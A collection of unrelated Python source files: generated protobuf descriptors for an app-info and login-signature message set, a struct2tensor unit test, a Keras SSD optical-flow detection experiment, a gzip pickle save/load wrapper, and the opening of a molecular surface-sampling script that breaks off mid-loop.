_descriptor.FieldDescriptor(
name='type', full_name='nested.C0011a.type', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='appid', full_name='nested.C0011a.appid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='openid', full_name='nested.C0011a.openid', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sessionkey', full_name='nested.C0011a.sessionkey', index=6,
number=7, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.C0011a.Extinfo', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1665,
serialized_end=1810,
)
_NESTED_Q2B = _descriptor.Descriptor(
name='q2b',
full_name='nested.q2b',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='mapInfo', full_name='nested.q2b.mapInfo', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='attachInfo', full_name='nested.q2b.attachInfo', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1812,
serialized_end=1865,
)
_NESTED_JUDGETIMING = _descriptor.Descriptor(
name='JudgeTiming',
full_name='nested.JudgeTiming',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='extInfo', full_name='nested.JudgeTiming.extInfo', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='appid', full_name='nested.JudgeTiming.appid', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='factType', full_name='nested.JudgeTiming.factType', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='duration', full_name='nested.JudgeTiming.duration', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='reportTime', full_name='nested.JudgeTiming.reportTime', index=4,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='afterCertify', full_name='nested.JudgeTiming.afterCertify', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='appType', full_name='nested.JudgeTiming.appType', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='scene', full_name='nested.JudgeTiming.scene', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='totalTime', full_name='nested.JudgeTiming.totalTime', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='launchId', full_name='nested.JudgeTiming.launchId', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='via', full_name='nested.JudgeTiming.via', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='AdsTotalTime', full_name='nested.JudgeTiming.AdsTotalTime', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hostExtInfo', full_name='nested.JudgeTiming.hostExtInfo', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1868,
serialized_end=2129,
)
_NESTED_GETAPPINFOBYLINK = _descriptor.Descriptor(
name='GetAppInfoByLink',
full_name='nested.GetAppInfoByLink',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='link', full_name='nested.GetAppInfoByLink.link', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='linkType', full_name='nested.GetAppInfoByLink.linkType', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2131,
serialized_end=2181,
)
_NESTED = _descriptor.Descriptor(
name='nested',
full_name='nested',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[_NESTED_A, _NESTED_B, _NESTED_JUDGETIMINGBUSIBUFF, _NESTED_GETAPPINFOBYLINKBUSIBUFF, _NESTED_USEUSERAPP, _NESTED_CHANNELINFO, _NESTED_USEUSERAPPBUSIBUFF, _NESTED_GETCODEBUSIBUFF, _NESTED_GETAPPINFOBYID, _NESTED_GETAPPINFOBYIDBUSIBUFF, _NESTED_D, _NESTED_C0011A, _NESTED_Q2B, _NESTED_JUDGETIMING, _NESTED_GETAPPINFOBYLINK, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=15,
serialized_end=2181,
)
_NESTED_A.containing_type = _NESTED
_NESTED_B.containing_type = _NESTED
_NESTED_JUDGETIMINGBUSIBUFF.fields_by_name['busiBuff'].message_type = _NESTED_JUDGETIMING
_NESTED_JUDGETIMINGBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_JUDGETIMINGBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_JUDGETIMINGBUSIBUFF.containing_type = _NESTED
_NESTED_GETAPPINFOBYLINKBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_GETAPPINFOBYLINKBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_GETAPPINFOBYLINKBUSIBUFF.containing_type = _NESTED
_NESTED_USEUSERAPP.fields_by_name['channelInfo'].message_type = _NESTED_CHANNELINFO
_NESTED_USEUSERAPP.containing_type = _NESTED
_NESTED_CHANNELINFO.containing_type = _NESTED
_NESTED_USEUSERAPPBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_USEUSERAPPBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_USEUSERAPPBUSIBUFF.containing_type = _NESTED
_NESTED_GETCODEBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_GETCODEBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_GETCODEBUSIBUFF.containing_type = _NESTED
_NESTED_GETAPPINFOBYID.containing_type = _NESTED
_NESTED_GETAPPINFOBYIDBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_GETAPPINFOBYIDBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_GETAPPINFOBYIDBUSIBUFF.containing_type = _NESTED
_NESTED_D.fields_by_name['Extinfo'].message_type = _NESTED_A
_NESTED_D.containing_type = _NESTED
_NESTED_C0011A.fields_by_name['Extinfo'].message_type = _NESTED_A
_NESTED_C0011A.containing_type = _NESTED
_NESTED_Q2B.fields_by_name['mapInfo'].message_type = _NESTED_A
_NESTED_Q2B.containing_type = _NESTED
_NESTED_JUDGETIMING.fields_by_name['extInfo'].message_type = _NESTED_Q2B
_NESTED_JUDGETIMING.containing_type = _NESTED
_NESTED_GETAPPINFOBYLINK.containing_type = _NESTED
DESCRIPTOR.message_types_by_name['nested'] = _NESTED
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
nested = _reflection.GeneratedProtocolMessageType('nested', (_message.Message,), {
'a' : _reflection.GeneratedProtocolMessageType('a', (_message.Message,), {
'DESCRIPTOR' : _NESTED_A,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.a)
})
,
'b' : _reflection.GeneratedProtocolMessageType('b', (_message.Message,), {
'DESCRIPTOR' : _NESTED_B,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.b)
})
,
'JudgeTimingBusiBuff' : _reflection.GeneratedProtocolMessageType('JudgeTimingBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_JUDGETIMINGBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.JudgeTimingBusiBuff)
})
,
'GetAppInfoByLinkBusiBuff' : _reflection.GeneratedProtocolMessageType('GetAppInfoByLinkBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETAPPINFOBYLINKBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetAppInfoByLinkBusiBuff)
})
,
'UseUserApp' : _reflection.GeneratedProtocolMessageType('UseUserApp', (_message.Message,), {
'DESCRIPTOR' : _NESTED_USEUSERAPP,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.UseUserApp)
})
,
'channelInfo' : _reflection.GeneratedProtocolMessageType('channelInfo', (_message.Message,), {
'DESCRIPTOR' : _NESTED_CHANNELINFO,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.channelInfo)
})
,
'UseUserAppBusiBuff' : _reflection.GeneratedProtocolMessageType('UseUserAppBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_USEUSERAPPBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.UseUserAppBusiBuff)
})
,
'GetCodeBusiBuff' : _reflection.GeneratedProtocolMessageType('GetCodeBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETCODEBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetCodeBusiBuff)
})
,
'GetAppInfoById' : _reflection.GeneratedProtocolMessageType('GetAppInfoById', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETAPPINFOBYID,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetAppInfoById)
})
,
'GetAppInfoByIdBusiBuff' : _reflection.GeneratedProtocolMessageType('GetAppInfoByIdBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETAPPINFOBYIDBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetAppInfoByIdBusiBuff)
})
,
'd' : _reflection.GeneratedProtocolMessageType('d', (_message.Message,), {
'DESCRIPTOR' : _NESTED_D,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.d)
})
,
'C0011a' : _reflection.GeneratedProtocolMessageType('C0011a', (_message.Message,), {
'DESCRIPTOR' : _NESTED_C0011A,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.C0011a)
})
,
'q2b' : _reflection.GeneratedProtocolMessageType('q2b', (_message.Message,), {
'DESCRIPTOR' : _NESTED_Q2B,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.q2b)
})
,
'JudgeTiming' : _reflection.GeneratedProtocolMessageType('JudgeTiming', (_message.Message,), {
'DESCRIPTOR' : _NESTED_JUDGETIMING,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.JudgeTiming)
})
,
'GetAppInfoByLink' : _reflection.GeneratedProtocolMessageType('GetAppInfoByLink', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETAPPINFOBYLINK,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetAppInfoByLink)
})
,
'DESCRIPTOR' : _NESTED,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested)
})
_sym_db.RegisterMessage(nested)
_sym_db.RegisterMessage(nested.a)
_sym_db.RegisterMessage(nested.b)
_sym_db.RegisterMessage(nested.JudgeTimingBusiBuff)
_sym_db.RegisterMessage(nested.GetAppInfoByLinkBusiBuff)
_sym_db.RegisterMessage(nested.UseUserApp)
_sym_db.RegisterMessage(nested.channelInfo)
_sym_db.RegisterMessage(nested.UseUserAppBusiBuff)
_sym_db.RegisterMessage(nested.GetCodeBusiBuff)
_sym_db.RegisterMessage(nested.GetAppInfoById)
_sym_db.RegisterMessage(nested.GetAppInfoByIdBusiBuff)
_sym_db.RegisterMessage(nested.d)
_sym_db.RegisterMessage(nested.C0011a)
_sym_db.RegisterMessage(nested.q2b)
_sym_db.RegisterMessage(nested.JudgeTiming)
_sym_db.RegisterMessage(nested.GetAppInfoByLink)
# @@protoc_insertion_point(module_scope)
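# Illustrative usage of the generated messages (comment only; the link value is
# a made-up example, while the message and field names come from the
# descriptors above):
#
#   req = nested.GetAppInfoByLink(link='https://example.com', linkType=0)
#   payload = req.SerializeToString()
#   decoded = nested.GetAppInfoByLink.FromString(payload)
#   assert decoded.link == 'https://example.com'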
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for struct2tensor.broadcast."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from struct2tensor import create_expression
from struct2tensor import path
from struct2tensor.expression_impl import size
from struct2tensor.test import expression_test_util
from struct2tensor.test import prensor_test_util
import tensorflow as tf
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
@test_util.run_all_in_graph_and_eager_modes
class SizeTest(tf.test.TestCase):
def test_size_anonymous(self):
expr = create_expression.create_expression_from_prensor(
prensor_test_util.create_big_prensor())
new_root, new_path = size.size_anonymous(expr, path.Path(["doc", "bar"]))
new_field = new_root.get_descendant_or_error(new_path)
leaf_node = expression_test_util.calculate_value_slowly(new_field)
self.assertAllEqual(leaf_node.parent_index, [0, 1, 2])
self.assertAllEqual(leaf_node.values, [1, 2, 1])
def test_size(self):
expr = create_expression.create_expression_from_prensor(
prensor_test_util.create_big_prensor())
new_root = size.size(expr, path.Path(["doc", "bar"]), "result")
new_field = new_root.get_descendant_or_error(path.Path(["doc", "result"]))
leaf_node = expression_test_util.calculate_value_slowly(new_field)
self.assertAllEqual(leaf_node.parent_index, [0, 1, 2])
self.assertAllEqual(leaf_node.values, [1, 2, 1])
def test_size_missing_value(self):
expr = create_expression.create_expression_from_prensor(
prensor_test_util.create_big_prensor())
new_root = size.size(expr, path.Path(["doc", "keep_me"]), "result")
new_field = new_root.get_descendant_or_error(path.Path(["doc", "result"]))
leaf_node = expression_test_util.calculate_value_slowly(new_field)
self.assertAllEqual(leaf_node.parent_index, [0, 1, 2])
self.assertAllEqual(leaf_node.values, [1, 1, 0])
def test_has(self):
expr = create_expression.create_expression_from_prensor(
prensor_test_util.create_big_prensor())
new_root = size.has(expr, path.Path(["doc", "keep_me"]), "result")
new_field = new_root.get_descendant_or_error(path.Path(["doc", "result"]))
leaf_node = expression_test_util.calculate_value_slowly(new_field)
self.assertAllEqual(leaf_node.parent_index, [0, 1, 2])
self.assertAllEqual(leaf_node.values, [True, True, False])
if __name__ == "__main__":
absltest.main()
|
# coding: utf-8
from keras.applications.imagenet_utils import preprocess_input
from keras.preprocessing import image
from scipy.misc import imread
import tensorflow as tf
from keras import backend as K
import time
from plot_util import *
from flow_util import *
from ssd_v2 import SSD300v2
from ssd_conv4_3 import SSD300_conv4_3
from ssd_utils import BBoxUtility
voc_classes = ['Aeroplane', 'Bicycle', 'Bird', 'Boat', 'Bottle',
'Bus', 'Car', 'Cat', 'Chair', 'Cow', 'Diningtable',
'Dog', 'Horse', 'Motorbike', 'Person', 'Pottedplant',
'Sheep', 'Sofa', 'Train', 'Tvmonitor']
NUM_CLASSES = len(voc_classes) + 1
network_size = 1024
batch_size = 2
input_shape = (network_size, network_size, 3)
colors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()
use_feature_flow = True
use_dump_file = False
plot_activation_enable = False
#image_files = ['/home/cory/cedl/vid/videos/vid04/0270.jpg', '/home/cory/cedl/vid/videos/vid04/0275.jpg']
#image_files = ['/home/cory/KITTI_Dataset/data_tracking_image_2/training/image_02/0000/000015.png',
# '/home/cory/KITTI_Dataset/data_tracking_image_2/training/image_02/0000/000018.png']
# magic case: vid04 270 - 299
# image_files = ['/home/cory/ssd_keras/GTAV/GD1015.png', '/home/cory/ssd_keras/GTAV/GD1020.png']
image_files = ['/home/cory/ssd_keras/GTAV/GD1293.png', '/home/cory/ssd_keras/GTAV/GD1295.png']
# '/home/cory/ssd_keras/GTAV/GD21.png'
# '/home/cory/cedl/vid/videos/vid04/1000.jpg'
def get_detections(result):
detections = map(lambda r: {'label': r[0],
'conf': r[1],
'xmin': r[2],
'ymin': r[3],
'xmax': r[4],
'ymax': r[5]},
result)
return detections
def get_layer_output(model, inputs, output_layer_name):
immediate_layer = K.function([model.input, K.learning_phase()],
[model.get_layer(name=output_layer_name).output])
output = immediate_layer([inputs, 1])[0]
return output
def get_layer_predict(model, input_layer_name, input_layer_feature):
    # K.function needs tensors, not Layer objects: feed the given feature map in
    # place of the named layer's output and evaluate the model's final output.
    immediate_layer = K.function([model.get_layer(name=input_layer_name).output, K.learning_phase()],
                                 [model.output])
    model_predict = immediate_layer([input_layer_feature, 1])[0]
    return model_predict
def load_inputs(file_list):
inputs = []
images = []
for file in file_list:
img = image.load_img(file, target_size=(network_size, network_size))
inputs.append(image.img_to_array(img))
images.append(imread(file))
return inputs, images
def run_network(model, inputs):
time_begin = time.time()
predictions = model.predict(inputs, batch_size=batch_size, verbose=1)
time_elapsed = time.time() - time_begin
print('elapsed time {:0.4f} sec {:.4f} fps'.format(time_elapsed, batch_size / time_elapsed))
return predictions
def compare_model_layer(model1, input1, layer1, model2, input2, layer2, plot_activation_enable=False):
layer_output1 = get_layer_output(model=model1, inputs=input1, output_layer_name=layer1)
layer_output2 = get_layer_output(model=model2, inputs=input2, output_layer_name=layer2)
diff = (layer_output1 - layer_output2)
print('layer_output1 sum =', sum(layer_output1[0].ravel()))
print('layer_output2 sum =', sum(layer_output2[0].ravel()))
print('diff min={:f} max={:f} sum={:f}'.format(
min(np.absolute(diff).ravel()),
max(np.absolute(diff).ravel()),
sum(np.absolute(diff).ravel())))
eq = np.array_equal(layer_output1, layer_output2)
if eq:
print('equal')
else:
print('not equal')
if plot_activation_enable:
plot_feature_map(layer_output1[0], 'feature_map_1')
plot_feature_map(layer_output2[0], 'feature_map_2')
def plot_detections(image_list, detection_result):
# for each image
for i, img in enumerate(image_list):
detections = get_detections(detection_result[i])
detections = list(filter(lambda x: x['conf'] > 0.8, detections))
fig = imshow_fig(img, title='frame_{:d}'.format(i+1))
current_axis = fig.gca()
for det in detections:
xmin = int(round(det['xmin'] * img.shape[1]))
ymin = int(round(det['ymin'] * img.shape[0]))
xmax = int(round(det['xmax'] * img.shape[1]))
ymax = int(round(det['ymax'] * img.shape[0]))
conf = det['conf']
label = int(det['label'])
label_name = voc_classes[label - 1]
display_txt = '{:0.2f}, {}'.format(conf, label_name)
# print(display_txt)
coords = (xmin, ymin), xmax - xmin + 1, ymax - ymin + 1
color = colors[label]
current_axis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))
current_axis.text(xmin, ymin, display_txt, bbox={'facecolor': color, 'alpha': 0.5})
fig.show()
def feature_flow():
bbox_util = BBoxUtility(NUM_CLASSES)
raw_inputs, images = load_inputs(image_files)
inputs = preprocess_input(np.array(raw_inputs))
dump_activation_layer = 'conv4_2'
compare_layer_name = 'conv6_2'
print('dump_activation_layer', dump_activation_layer)
print('target_layer_name', compare_layer_name)
# normal SSD network
model1 = SSD300v2(input_shape, num_classes=NUM_CLASSES)
model1.load_weights('weights_SSD300.hdf5', by_name=True)
predictions = run_network(model1, inputs)
results = bbox_util.detection_out(predictions)
plot_detections(images, results)
# get dump layer's output (as input for flow network)
input_img2 = inputs[1:2, :, :, :]
layer_dump = get_layer_output(model=model1, inputs=input_img2, output_layer_name=dump_activation_layer)
print('layer_dump.shape = ', layer_dump.shape)
# flow (raw rgb)
flow_rgb = compute_flow(image_files[1], image_files[0])
print('flow.shape', flow_rgb.shape)
imshow_fig(cv2.cvtColor(draw_hsv(flow_rgb), cv2.COLOR_BGR2RGB), title='flow_rgb')
# flow (re-sized for feature map)
flow_feature = get_flow_for_filter(flow_rgb)
# imshow_fig(flow_feature[:, :, 0], title='flow_feature_y', cmap='gray')
# imshow_fig(flow_feature[:, :, 1], title='flow_feature_x', cmap='gray')
# warp image by flow_rgb
iimg1 = cv2.imread(image_files[0])
img_warp = warp_flow(iimg1, flow_rgb)
imshow_fig(cv2.cvtColor(img_warp, cv2.COLOR_BGR2RGB), title='frame_2_warp')
# shift feature
shifted_feature = shift_filter(layer_dump, flow_feature)
# flow net
model2 = SSD300_conv4_3((128, 128, 512), num_classes=NUM_CLASSES)
model2.load_weights('weights_SSD300.hdf5', by_name=True)
predictions = run_network(model2, shifted_feature)
results = bbox_util.detection_out(predictions)
plot_detections(images[1:2], results)
# get specific layer's output and compare them (for debugging)
compare_model_layer(model1, input_img2, compare_layer_name,
model2, shifted_feature, compare_layer_name,
True)
sess.close()
plt.show()
def get_flow_for_filter(flow):
filter_map_width = 128
flow_ratio_y = flow.shape[0] / filter_map_width
flow_ratio_x = flow.shape[1] / filter_map_width
flow_small = np.asarray([cv2.resize(flow[:, :, 0] / flow_ratio_y, (filter_map_width, filter_map_width)),
cv2.resize(flow[:, :, 1] / flow_ratio_x, (filter_map_width, filter_map_width))])
flow_small = flow_small.transpose([1, 2, 0])
print('flow_small.shape', flow_small.shape)
return flow_small
if __name__ == '__main__':
config = tf.ConfigProto(
device_count={'GPU': 1}
)
config.gpu_options.per_process_gpu_memory_fraction = 0.5
sess = tf.Session(config=config)
K.set_session(sess)
feature_flow()
|
"""
.. module:: PickleWrapper
   :synopsis: Wrapper for the pickle object-saving package
.. moduleauthor:: Ambra Demontis <ambra.demontis@unica.it>
.. moduleauthor:: Marco Melis <marco.melis@unica.it>
"""
import pickle
import gzip
from secml.utils import fm
# Remember to add any new method to following list
__all__ = ['save', 'load']
def save(file_path, obj):
"""Save object to file using cPickle.
This functions stores a generic python object into
a compressed gzip file (`*.gz`).
Saved objects can be loaded using `.load`.
Parameters
----------
file_path : str
Path to destination file.
obj : object
Any python object to save.
Returns
-------
obj_path : str
Full path to the stored object.
Notes
-----
Objects are stored using **protocol 4** data stream format.
For more information see
https://docs.python.org/3/library/pickle.html#data-stream-format
"""
# Adding extension to destination file if user forgot about it...
file_ext = fm.splitext(file_path)[1]
file_path = file_path + '.gz' if file_ext != '.gz' else file_path
# open the reference to target file
with gzip.open(file_path, 'wb') as f_ref:
pickle.dump(obj, f_ref, protocol=4)
return fm.join(fm.abspath(file_path), fm.split(file_path)[1])
def load(file_path, encoding='bytes'):
"""Load object from cPickle file.
Load a generic gzip compressed python object created by `.save`.
Parameters
----------
file_path : str
Path to target file to read.
encoding : str, optional
Encoding to use for loading the file. Default 'bytes'.
"""
with gzip.open(file_path, 'rb') as f_ref:
# Loading and returning the object
return pickle.load(f_ref, encoding=encoding)
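# Minimal usage sketch (comment only; the path and object are arbitrary
# examples, `save` and `load` are the functions defined above):
#
#   stored_path = save('/tmp/my_object', {'a': 1, 'b': [2, 3]})  # writes '/tmp/my_object.gz'
#   restored = load(stored_path)
#   assert restored == {'a': 1, 'b': [2, 3]}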
|
#!/usr/bin/env python3
import argparse
import pygamer
import numpy as np
import pyvista as pv
import pyacvd
import vtk
from pathlib import Path
from lightdock.pdbutil.PDBIO import create_pdb_from_points
def parse_command_line():
"""Parses command line arguments"""
parser = argparse.ArgumentParser(prog='surface-sampler')
parser.add_argument("molecule", help="PDB file for input structure")
parser.add_argument("distance", type=float, default=10.0, help="Distance to surface")
parser.add_argument("points", type=int, default=400, help="Number of points to generate")
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_command_line()
# Mesh the protein of interest
# mesh = pygamer.readPDB_molsurf(args.molecule)
mesh = pygamer.readPDB_gauss(args.molecule)
# Compute the normal orientation
components, orientable, manifold = mesh.compute_orientation()
mesh.correctNormals()
print(F"The mesh has {components} components, is"
F" {'orientable' if orientable else 'non-orientable'}, and is"
F" {'manifold' if manifold else 'non-manifold'}.")
meshes = mesh.splitSurfaces()
for i, m in enumerate(meshes):
print(F"Mesh {i} is {m.getVolume()} A^3 in volume.")
# Keep only the larger mesh
mesh = meshes[0]
for v in mesh.vertexIDs:
v.data().selected = True
# Apply 5 iterations of smoothing
mesh.smooth(max_iter=5, preserve_ridges=False, verbose=True)
for i in range(5):
# Coarsen dense regions of the mesh
mesh.coarse_dense(rate=2, numiter=3)
# Coarsen flat regions of the mesh
mesh.coarse_flat(rate=0.1, numiter=3)
mesh.smooth(max_iter=3, preserve_ridges=True, verbose=False)
print(F"Iteration {i+1}: {mesh.nVertices} vertices, {mesh.nEdges} edges, and {mesh.nFaces} faces.")
# Center mesh at 0,0,0
# center, radius = mesh.getCenterRadius()
# mesh.translate(-center)
# Set boundary markers of the mesh to 23
for faceID in mesh.faceIDs:
faceID.data().marker = 23
# Get the root metadata
gInfo = mesh.getRoot()
    gInfo.ishole = True  # Don't mesh the inside of the surface
gInfo.marker = -1
path = Path(args.molecule)
obj_name = f'{path.stem}.obj'
pygamer.writeOBJ(obj_name, mesh)
# Pyvista
mesh = pv.read(obj_name)
shell = mesh.decimate(0.97, volume_preservation=True).extract_surface()
print(f'Decimation: {len(mesh.points)} -> {len(shell.points)}')
# warp each point by the normal vectors
for i in range(1,int(args.distance)+1):
